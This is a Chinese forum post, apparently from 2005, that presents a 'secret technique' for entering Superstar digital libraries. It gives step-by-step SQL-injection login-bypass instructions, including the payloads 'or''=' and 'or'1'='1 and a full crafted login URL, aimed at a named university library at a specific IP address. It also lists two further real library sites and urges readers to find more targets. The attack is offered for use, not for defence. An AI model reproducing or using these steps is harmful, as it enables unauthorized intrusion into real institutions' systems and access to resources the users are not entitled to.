| 查看: 2114 | 回复: 32 | |||
| 当前主题已经存档。 | |||
| 当前只显示满足指定条件的回帖,点击这里查看本话题的所有回帖 | |||
applepie119木虫 (著名写手)
|
[交流]
[分享]新发现利用asp漏洞进超星图书馆秘技
|
||
|
[分享]新发现利用asp漏洞进超星图书馆秘技 这是在看了论坛上的一个帖子后测试找出来的,特向菜鸟们推荐, 希望对大家有所帮助! 深圳广播电视大学数字图书馆 http://218.17.219.22/bookhtm/index.asp 搜索需要输入用户名、密码 我们可以构造查询条件,突破限制 做法如下: 1.随便输入学号、密码,登陆,例如:学号=1,密码=1.这时会出现“此用户不存在!返回” ie地址栏中地址为:http://218.17.219.22/bookhtm/sq/ ... ;B1.x=31&B1.y=6 2.修改地址进入: 将上面地址中user=1&mima=1改为:user='or''='&mima='or''=' 或者user='or'1'='1&mima='or'1'='1 也可 即:http://218.17.219.22/bookhtm/sq/load.asp?user='or''='&mima='or''='&B1.x=31&B1.y=6 就是登陆地址了。 3.登陆后可以随便看了 同样的道理利用这个漏洞,可以登陆另外几个需要输入用户名、密码的站点,需要输入的地方都输上'or''=' 如:驻马店电大:http://www.zmdtvu.net/dabookhtm/ 铜陵电大:http://218.22.180.149/index.asp其他的自己好好发掘吧,^_^ |
» 猜你喜欢
过年走亲戚时感受到了所开私家车的鄙视链
已经有10人回复
今年春晚有几个节目很不错,点赞!
已经有12人回复
情人节自我反思:在爱情中有过遗憾吗?
已经有13人回复
体制内长辈说体制内绝大部分一辈子在底层,如同你们一样大部分普通教师忙且收入低
已经有12人回复
基金正文30页指的是报告正文还是整个申请书
已经有5人回复
9楼2005-10-07 13:20:51
7楼2005-09-10 20:45:41













回复此楼